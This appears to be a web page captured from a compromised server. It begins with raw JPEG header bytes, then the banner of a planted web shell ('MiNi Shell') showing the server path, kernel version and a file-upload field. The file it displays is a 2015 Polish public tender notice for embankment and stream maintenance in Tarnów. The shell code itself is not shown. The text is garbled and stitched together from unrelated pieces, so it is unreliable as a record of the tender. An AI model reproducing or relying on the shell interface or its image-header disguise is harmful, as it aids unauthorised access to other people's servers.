JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150916/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150916/242458-N-2015.html

<p class="kh_header"><b>Tarnów: Usługi konserwacyjne na wałach i potokach powiatu dąbrowskiego i bocheńskiego</b><br>
<b>Numer ogłoszenia: 242458 - 2015; data zamieszczenia: 16.09.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Małopolski Zarząd Melioracji i Urządzeń Wodnych w Krakowie Inspektorat Rejonowy w Tarnowie , ul. Ostrogskich 5, 33-100 Tarnów, woj. małopolskie, tel. 014 6376922, faks 014 6376913.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.mzmiuw.krakow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługi konserwacyjne na wałach i potokach powiatu dąbrowskiego i bocheńskiego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Część 1 zamówienia
Przedmiotem zamówienia jest wykonanie usługi konserwacji bieżącej dla zadania pn:
Wały rzeki Żabnica-Breń w km P: 11+330-11+650, 11+650-13+410, 14+190-14+200, 14+720-14+730, 15+390-15+400, 15+710-15+720, 15+800-15+810, 15+900-17+200, 17+380-18+270, 20+900-21+300, L: 11+240-11+250, 12+200-12+350, 12+400-12+500, 12+580-12+590 - likwidacja kolein i zaniżeń ramp przejazdowych.
Zamówienie obejmuje:
Wał prawy km 11+330-11+650, 11+650-13+410, 15+900-17+200, 17+380-18+270, 20+900-21+300; Wał lewy km 12+200-12+350, 12+400-12+500 łącznie z rampami 7 szt.:
wykoszenie porostów z korony wału porost gęsty twardy - 12275 m2, likwidacja kolein w koronie wału poprzez zasypanie gruntem kategorii III  z transportem urobku z 6 km samochodami samowyładowczymi z usunięciem warstwy ziemi urodzajnej z korony do ponownego wbudowania z zagęszczeniem - 2530,83 m3, obsianie koron wałów mieszanką traw - 11613 m2
Rampy wał prawy w km 14+190-14+200, 14+720-14+730, 15+390-15+400, 15+710-15+720, 15+800-15+810; Wał lewy w km 11+240-11+250, 12+580-12+590:
uzupełnienie nawierzchni płytami ażurowymi typu krata mała o wymiarach elementów 90x60 (zbrojone) 14 ramp - 186,72 m2, uzupełnienie nawierzchni z klińca kamiennego o grubości po zgęszczeniu 10cm - 630 m2, uzupełnienie nawierzchni z tłucznia kamiennego z warstwą górną o grubości po zgęszczeniu 10cm - 630 m2.

Część 2 zamówienia
Przedmiotem zamówienia jest wykonanie usługi konserwacji bieżącej dla zadania pn:
Prawy wał potoku Wielopólka w km 0+000-0+780 - likwidacja kolein.
Zamówienie obejmuje:
Wykoszenie porostów z korony i skarpy wału porost gęsty twardy - 3900 m2, wygrabianie wykoszonych porostów ze skarp o szerokości ponad 2,0m	- 3900 m2, likwidacja kolein w koronie wału poprzez zasypanie gruntem kategorii III z ukopu z usunięciem warstwy ziemi urodzajnej z korony do ponownego wbudowania z zagęszczeniem - 748,8 m3, naprawa cząstkowa skarp i dna rowka odpływowego od śluzy umocnionego prefabrykowanymi płytami żelbetowymi o wymiarach 10x60x90cm - 6,48 m2, obsianie korony wału mieszanką traw - 1248 m2.

Część 3 zamówienia
Przedmiotem zamówienia jest wykonanie usługi konserwacji bieżącej dla zadania pn:
Potok Proszowski w km 0+000-7+500 uregulowany - konserwacja bieżąca
Zamówienie obejmuje:
Ręczne wykoszenie porostów gęstych twardych ze skarp obustronnie - w km 0+000-0+320 szer. skarp 5,0 m, w km 0+320-0+700 szer. skarp 4,0 m,  w km 0+700-1+627 szer. skarp  3,0 m, w km 2+610-2+747 szer. skarp 3,0 m, w km 4+119-4+171 szer. skarp 3,0 m, w km 7+048-7+500 szer. skarp 2,0m, -	14744,00 m2, wygrabienie wykoszonych porostów ze skarp o szerokości ponad 2,0m ze złożeniem przy górnej krawędzi skarp - 14744,00 m2, ręczne wykoszenie porostów gęstych twardych z dna potoku -  w km 0+000-0+700 szer. dna 1,2 m, w km 0+700-1+627 szer. dna 1,0 m, w  km 2+610-2+747 szer. dna 1,0 m, w km 4+119-4+171 szer. dna 1,0 m,  w km 7+048-7+100 szer.  dna 1,0 m, w km 7+100- 7+500 szer. dna 0,8m - 2328,00 m2, wygrabianie wykoszonych porostów z dna cieków o szerokości do 2,0m ze złożeniem przy górnej krawędzi skarp - 2328,00 m2, udrożnienie dna potoku - w  km 0+300-1+627,  w  km  2+610-2+747,  w  km 4+119- 4+171,  w  km 7+048 - 7+100  - szer. dna 1,0 m, zamulenie do 20cm - wyrzucenie namułu na pobocze przy krawędzi skarpy z rozplantowaniem  względnie odłożenie na uszkodzonych skarpach z ubiciem i wyrównaniem powierzchni skarp potoku - 1568,00 mb, udrożnienie dna potoku - w  km 7+100-7+500  - szer. dna 0,8 m, zamulenie do 20cm - wyrzucenie namułu na pobocze względnie ułożenie na uszkodzonych skarpach, rozplantowanie namułu lub ubicie zasypanych skarp i wyrównanie, oczyszczenie pasów szer. 0,6 m wzdłuż krawędzi cieku - 400,00 mb, oczyszczanie kęp z krzaków lub starek przy poroście rzadkim lub średnim ze złożeniem przy górnej krawędzi skarp potoku, przycięcie zwisających gałęzi z drzew - 450,00m2, ręczne usunięcie z przerzutem, warstwy ziemi urodzajnej z darnią grubości do 15cm, wyrzucenie na pobocze z rozplantowaniem względnie odłożenie  na uszkodzonych skarpach potoku z ubiciem i wyrównaniem zasypanych skarp (ścięcie zwisów) - 680,40 m2, oczyszczenie przepustów rurowych o średnicy 0,80m z namułu o głębokości zamulenia przewodu do 1/3 wysokości średnicy - 16,00 m, oczyszczenie koryta potoku z lokalnych zatorów z cienkich i grubych gałęzi, trawy i  ziemi z przerzutem na pobocze z ułożeniem przy górnych skarpach potoku - 12,60 m3, ręczne wykoszenie porostów gęstych twardych ze skarp obustronnie -  w km 1+627- 2+610 szer. skarp  3,0 m, w km 2+747-4+119 szer. skarp 3,0 m, w km 4+171-7+048 szer. skarp 3,0 m - 31392,00 m2, wygrabianie wykoszonych porostów ze skarp o szerokości ponad 2,0m ze złożeniem przy górnej krawędzi skarp	- 31392,00 m2, ręczne wykoszenie porostów gęstych twardych z dna potoku - w km 1+627-1+822 szer. dna 1,0 m,  w  km 1+822-2+156  szer. dna 1,30 m, w km 2+156-2+610 szer. dna 1,0 m, w km 2+747-4+119 szer. dna 1,30 m, w km 4+171-5+176 szer. dna 1,0 m, w km 5+176-7+048 szer. dna 1,30 m - 6305,40 m2, wygrabienie wykoszonych porostów z dna cieków o szerokości do 2,0m ze złożeniem przy górnej krawędzi skarp - 6305,40 m2, udrożnienie dna potoku (ubezpieczonego kiszkami faszynowymi) - w km 1+627-1+822, w km 2+156-2+610, w km 4+171-5+176 szer. dna 1,0 m, zamulenie do 20cm - wyrzucenie namułu na pobocze względnie ułożenie na uszkodzonych skarpach, rozplantowanie namułu lub ubicie zasypanych skarp i wyrównanie, oczyszczenie pasów szer. 0,6 m wzdłuż krawędzi cieku - 1654,00 mb, udrożnienie dna potoku (ubezpieczonego płytami ażurowymi w dnie i na skarpach) - w km 1+822-2+156, w km 2+747-4+119, w km 5+176-7+048 szer. dna 1,30 m, zamulenie do 20cm - wyrzucenie namułu na pobocze względnie ułożenie na uszkodzonych skarpach, rozplantowanie namułu lub ubicie zasypanych skarp  i wyrównanie, oczyszczenie pasów szer. 0,6 m wzdłuż krawędzi cieku - 3578,00 mb, oczyszczanie kęp z krzaków lub starek przy poroście rzadkim lub średnim ze złożeniem przy górnej krawędzi skarp potoku, przycięcie zwisających gałęzi z drzew - 850,00 m2, ręczne usunięcie z przerzutem warstwy ziemi urodzajnej z darnią grubości do 15cm, wyrzucenie na pobocze z rozplantowaniem względnie odłożenie  na uszkodzonych skarpach potoku z ubiciem i wyrównaniem zasypanych skarp (ścięcie zwisów) - 1569,60 m2, oczyszczenie przepustów rurowych o średnicy 0,60m z namułu o głębokości zamulenia przewodu do 1/3 wysokości średnicy	- 9,00 m, oczyszczenie przepustów rurowych o średnicy 0,80m z namułu o głębokości zamulenia przewodu do 1/3 wysokości średnicy - 24,00 m, oczyszczenie przepustów rurowych o średnicy 1,0m z namułu o głębokości zamulenia przewodu do 1/3 wysokości średnicy - 10,00m, oczyszczenie przepustów rurowych o średnicy 1,50m z namułu o głębokości zamulenia przewodu do 1/3 wysokości średnicy	- 92,00 m, oczyszczenie przepustów ramowych 1,0x1,0m z namułu o głębokości zamulenia przewodu do 1/3 wysokości - 16,00 m, oczyszczenie przepustów ramowych 1,5x1,5m z namułu o głębokości zamulenia przewodu do 1/3 wysokości - 16,00 m, oczyszczenie przepustów ramowych 2,0x2,0m z namułu o głębokości zamulenia przewodu do 1/3 wysokości - 84,00 m, oczyszczenie koryta potoku z lokalnych zatorów z cienkich i grubych gałęzi, trawy i  ziemi z przerzutem na pobocze z ułożeniem przy górnych skarpach potoku - 9,85 m3.
Uwaga. Potok Proszowski w km 1+200-1+450 oraz w km 4+110- 5+000 graniczy z terenem objętym ochroną przyrody - obszarem Natura 2000 Puszcza Niepołomicka.

Część 4 zamówienia
Przedmiotem zamówienia jest wykonanie usługi konserwacji bieżącej dla zadania pn:
Potok Łapczycki w km 0+000 - 0+730, 1+870 - 2+110, 3+080 - 4+089 uregulowany w km 0+730 - 1+870, 2+110 - 3+080 nieuregulowany m. Moszczenica, Łapczyca gm. Bochnia - konserwacja bieżąca
Zamówienie obejmuje:
Ręczne wykoszenie porostów gęstych twardych ze skarp  obustronnie w  km  0+000-0+730,  w  km  1+870-2+110  przy  szerokości  skarp 4,0m - 7760 m2, wygrabianie wykoszonych porostów ze skarp o szerokości ponad 2,0m ze złożeniem przy górnej krawędzi skarpy - 7760 m2, oczyszczanie kęp ze zniszczonej wikliny przy poroście gęstym oraz przycięcie zwisających gałęzi drzew, lokalnie w km jw. obustronnie ze złożeniem poza górną krawędzią skarpy - 3692 m2, lokalnie w km 0+000-0+730, w km 1+870-2+110 oraz w km 3+080 -4+089 usunięcie nawisów i nieczystości - wykopy oraz przekopy w gruncie kategorii III  wykonywane na odkład koparką z odłożeniem na brzeg z rozplantowaniem - 251,28 m3, roboty ziemne poprzeczne na przerzut z wbudowaniem ziemi w nasyp w gruncie kategorii III - oczyszczenie  kaskady dwustopniowej i stopnia z namułu i nieczystości z odłożeniem na brzeg - 27 m3, oczyszczenie koryta potoku z lokalnych zatorów z cienkich i grubych gałęzi, trawy i  ziemi z przerzutem na pobocze z ułożeniem przy górnych skarpach potoku - 26,77 m3, roboty ziemne (odmulanie) w gruncie kategorii III z transportem urobku samochodami poza obręb robót - udrożnienie światła pod mostem na drodze E-4 namuł grub. 0,5 m na szer. 7m i dług. 11m oraz udrożnienie przepustu ramowego zamulonego do 1/3 wysokości przepustu - 51,3 m3, ręczne wykoszenie porostów gęstych twardych ze skarp obustronnie w km 0+730 - 1+870,  w  km  2+110 - 3+080 przy szerokości skarp 4,0m  bez wygrabienia - 16880 m2, oczyszczanie kęp ze zniszczonej wikliny przy poroście gęstym oraz przycięcie zwisających gałęzi drzew, lokalnie w km jw. obustronnie ze złożeniem poza górną krawędzią skarpy - 8440 - m2, oczyszczenie koryta potoku z lokalnych zatorów z cienkich i grubych gałęzi, trawy i  ziemi z przerzutem na pobocze z ułożeniem przy górnych skarpach potoku - 38,95 m3, lokalnie  w  km  0+730 - 1+870, w km 2+110 - 3+080 usunięcie nawisów i nieczystości - wykopy oraz przekopy w gruncie kategorii III  wykonywane na odkład koparką z odłożeniem na brzeg z rozplantowaniem - 506,4 m3.

Uwaga - dotyczy wszystkich części zamówienia:
1)	Zamawiający wymaga ustanowienia nadzoru przyrodniczego nad realizowanymi pracami. Wykonawca jest zobowiązany do dokumentowania prowadzonych prac w formie comiesięcznego sprawozdania. Sprawozdanie końcowe z nadzoru należy przekazać do RDOŚ w Krakowie. Wykonawca wszelkie koszty związane z nadzorem przyrodniczym pokrywa we własnym zakresie.
2)	W celu prawidłowej wyceny oferty, należy przed jej sporządzeniem dokonać wizji w terenie.
3)	Wykonawca zobowiązany jest we własnym zakresie uzyskać stosowne zezwolenie na transport po przyległych drogach na czas wykonywania prac. Transport należy dostosować do nośności i klasy dróg. W przypadku zniszczenia dróg lokalnych w obrębie prac, po zakończeniu prac należy je przywrócić do stanu pierwotnego. Wszelkie koszty związane z transportem materiałów i sprzętu na teren prac ponosi Wykonawca.

Uwaga (dotyczy cz. 3 i 4 zamówienia):
Zamiar i sposób prowadzenia prac konserwacyjnych na potokach został zgłoszony do Regionalnej Dyrekcji Ochrony Środowiska w Krakowie (kopie zgłoszeń oraz uzgodnienia RDOŚ są załącznikami do SIWZ). Sposób prowadzenia prac musi być zgodny z opisanym w zgłoszeniach i przy zachowaniu wymagań RDOŚ.

Szczegółowy opis przedmiotu zamówienia zawierają również przedmiary robót stanowiące załączniki do SIWZ..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 71.31.11.00-2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wadium w wysokości 
dla części 1 zamówienia - 2000 PLN
dla części 2 zamówienia - 300 PLN
dla części 3 zamówienia - 1000 PLN
dla części 4 zamówienia - 500 PLN
należy wnieść przed upływem terminu składania ofert. 
Wadium winno być wniesione w:
1) pieniądzu
2) poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo- kredytowej, z   tym że poręczenie kasy jest zawsze poręczeniem pieniężnym
3) gwarancjach bankowych
4) gwarancjach ubezpieczeniowych
5) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości ( tj. Dz. U. Nr 42, poz. 275 z 2007 r. z późn. zmianami)
Wadium wnoszone w pieniądzu należy przelać na rachunek bankowy zamawiającego: Pekao S.A.  nr konta 48 1240 6292 1111 0010 5126 1194.
Wadium w innej formie niż pieniądz należy złożyć w formie oryginału w siedzibie Zamawiającego w Tarnowie ul. Ostrogskich 5 sekretariat ( I piętro ).
Dowód wpłaty wadium należy dołączyć do oferty. 
1.2 Wadium wnoszone w formie gwarancji lub poręczeń musi spełniać następujące wymogi:
- być wystawione na Małopolski Zarząd Melioracji i Urządzeń Wodnych w Krakowie 
-zawierać w swej treści oświadczenie gwaranta (poręczyciela), w którym zobowiązuje się on do bezwarunkowej wypłaty kwoty wadium na pierwsze żądanie Zamawiającego zawierające oświadczenie, że zaszła jedna z przesłanek wymienionych w art. 46 ust 4a i/lub  5 Ustawy
- okres ważności wadium nie może być krótszy niż okres związania ofertą.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający dokona oceny spełniania warunków zgodnie z formułą spełnia nie spełnia na podstawie informacji zawartych w dostarczonych dokumentach i oświadczeniach wymaganych w specyfikacji.
Warunek ten zostanie spełniony jeżeli wykonawca wykaże, że w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał co najmniej 1 usługę (potwierdzoną dowodami, że została wykonane należycie):
dla części 1 zamówienia - o wartości nie mniejszej niż 90 000,00 zł (słownie: dziewięćdziesiąt tysięcy złotych) w zakresie konserwacji bieżącej wałów przeciwpowodziowych
dla części 2 zamówienia - o wartości nie mniejszej niż 15 000,00 zł (słownie: piętnaście tysięcy złotych) w zakresie konserwacji bieżącej wałów przeciwpowodziowych
dla części 3 zamówienia - o wartości nie mniejszej niż 50 000,00 zł (słownie: pięćdziesiąt tysięcy złotych) w zakresie konserwacji bieżącej w korytach cieków wodnych
dla części 4 zamówienia - o wartości nie mniejszej niż 20 000,00 zł (słownie: dwadzieścia tysięcy złotych) w zakresie konserwacji bieżącej w korytach cieków wodnych.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający dokona oceny spełniania warunków zgodnie z formułą spełnia nie spełnia na podstawie informacji zawartych w dostarczonych dokumentach i oświadczeniach wymaganych w specyfikacji.
Warunek ten zostanie spełniony, jeżeli wykonawca wykaże, że jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem niniejszego zamówienia na wartość:
dla części 1 zamówienia - o wartości nie mniejszej niż 90 000,00 zł (słownie: dziewięćdziesiąt tysięcy złotych)
dla części 2 zamówienia - o wartości nie mniejszej niż 15 000,00 zł (słownie: piętnaście tysięcy złotych)
dla części 3 zamówienia - o wartości nie mniejszej niż 50 000,00 zł (słownie: pięćdziesiąt tysięcy złotych)
dla części 4 zamówienia - o wartości nie mniejszej niż 20 000,00 zł (słownie: dwadzieścia tysięcy złotych).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
